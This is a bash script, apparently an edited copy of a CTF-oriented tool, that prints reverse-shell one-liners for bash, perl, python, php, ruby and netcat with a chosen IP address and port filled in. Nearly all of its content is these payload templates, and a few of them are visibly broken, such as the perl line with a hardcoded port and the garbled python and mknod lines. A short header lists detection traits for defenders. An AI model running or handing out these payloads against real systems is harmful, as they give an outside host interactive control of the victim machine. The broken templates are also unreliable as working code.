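#!/bin/bash
#
# monkey-shell.sh - print reverse-shell one-liners with an IP address and
# port filled in. The project README describes the script as ideal for CTF
# and HTB challenges and adds "Use on your own risk".
#
# Usage: ./monkey-shell.sh [-i ip_address] [-p port]
#   -i  address substituted into the templates (default: the source address
#       reported by `ip route get 1.1.1.1`)
#   -p  port substituted into the templates that reference $port
#       (default: 4444)
#
# The script only prints text; it opens no connection itself.
#
# Detection notes for defenders: the printed commands share a few observable
# traits - an interactive shell (/bin/sh -i, bash -i) whose standard streams
# are redirected to a TCP socket, bash's /dev/tcp pseudo-device, nc started
# with -e or -c, and a named pipe created under /tmp (/tmp/f, /tmp/p).
# Process command-line logging and outbound-connection filtering are the
# usual places to catch them.

# Print a message to stderr and stop with a usage-error status.
die() {
  printf '%s\n' "$*" >&2
  exit 2
}

# Print the command-line synopsis.
usage() {
  printf 'Usage: %s [-i ip_address] [-p port]\n' "${0##*/}"
}

# Succeed when $1 is a decimal TCP port in 1..65535 with no leading zero.
is_valid_port() {
  [[ $1 =~ ^[1-9][0-9]{0,4}$ ]] && (( $1 <= 65535 ))
}

# Succeed when $1 holds only characters found in IPv4/IPv6 literals and
# host names. Backslashes, quotes, whitespace and shell metacharacters are
# rejected so that `echo -e` below cannot interpret escapes from the input
# and the printed lines contain nothing but the intended address.
is_valid_host() {
  [[ $1 =~ ^[A-Za-z0-9._:-]+$ ]]
}

# Leading ':' puts getopts in silent mode so errors are reported here.
while getopts ':i:p:' flag; do
  case "${flag}" in
    i) ip_addr=${OPTARG} ;;
    p) port=${OPTARG} ;;
    :) die "option -${OPTARG} requires an argument" ;;
    *)
      usage >&2
      exit 2
      ;;
  esac
done

port=${port:-4444}
is_valid_port "$port" || die "invalid port: $port (expected 1-65535)"

if [[ -z "${ip_addr:-}" ]]; then
  # -n ... p prints only when the "src <addr>" field was actually found, so
  # an unexpected first line is not taken as the address.
  ip_addr="$(ip route get 1.1.1.1 2>/dev/null \
    | sed -n 's/.*src \([0-9.]\+\).*/\1/p;q')"
  if [[ -z "$ip_addr" ]]; then
    # The original carried on silently with an empty address; keep going
    # but say so.
    printf 'warning: could not detect a local address; pass one with -i\n' >&2
  fi
fi

if [[ -n "$ip_addr" ]]; then
  is_valid_host "$ip_addr" || die "invalid address: $ip_addr"
fi

# The templates below are reproduced verbatim from the original listing;
# only the surrounding option handling was changed.
echo -e "\e[41m[bash]\e[0m bash -i >& /dev/tcp/$ip_addr/$port 0>&1"
echo -e "\e[41m[bash]\e[0m 0<&196;exec 196<>/dev/tcp/$ip_addr/$port; sh <&196 >&196 2>&196"
echo -e "\e[41m[bash]\e[0m exec 5<>/dev/tcp/$ip_addr/$port | cat <&5 | while read line; do $line 2>&5 >&5; done"
echo -e "\e[42m[perl]\e[0m perl -e 'use Socket;\$i=\"$ip_addr\";\$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'"
echo -e "\e[42m[perl]\e[0m perl -MIO -e '\$p=fork;exit,if(\$p);\$c=new IO::Socket::INET(PeerAddr,\"$ip_addr:$port\");STDIN->fdopen(\$c,r);$~->fdopen(\$c,w);system\$_ while<>;'"
echo -e "\e[42m[perl]\e[0m\e[47m[win]\e[0m perl -MIO -e '\$c=new IO::Socket::INET(PeerAddr,\"$ip_addr:$port\");STDIN->fdopen(\$c,r);$~->fdopen(\$c,w);system\$_ while<>;'"
echo -e "\e[43m[python]\e[0m python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"$ip_addr\",$port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"\e[0m);'"
echo -e "\e[43m[python3]\e[0m python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"$ip_addr\",$port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"\e[0m);'"
echo -e "\e[44m[php]\e[0m php -r '\$sock=fsockopen(\"$ip_addr\",$port);exec(\"/bin/sh -i \<\&3 \>\&3 2\>\&3\");'"
echo -e "\e[45m[ruby]\e[0m ruby -rsocket -e'f=TCPSocket.open(\"$ip_addr\",$port).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'"
echo -e "\e[45m[ruby]\e[0m ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"$ip_addr\",\"$port\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'"
echo -e "\e[45m[ruby]\e[0m ruby -rsocket -e 'c=TCPSocket.new(\"$ip_addr\",\"$port\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'"
echo -e "\e[46m[netcat]\e[0m nc -e /bin/sh $ip_addr $port"
echo -e "\e[46m[netcat]\e[0m nc -e /bin/bash $ip_addr $port"
echo -e "\e[46m[netcat]\e[0m nc -c /bin/sh $ip_addr $port"
echo -e "\e[46m[netcat]\e[0m nc -c /bin/bash $ip_addr $port"
echo -e "\e[46m[netcat]\e[0m /bin/sh | nc $ip_addr $port"
echo -e "\e[46m[netcat]\e[0m rm -f /tmp/p; mknod /tmp/p p && nc $ip_addr $port 0/tmp/p"
echo -e "\e[46m[netcat]\e[0m rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ip_addr $port >/tmp/f"
echo -e "\e[46m[netcat]\e[0m rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc $ip_addr $port >/tmp/f"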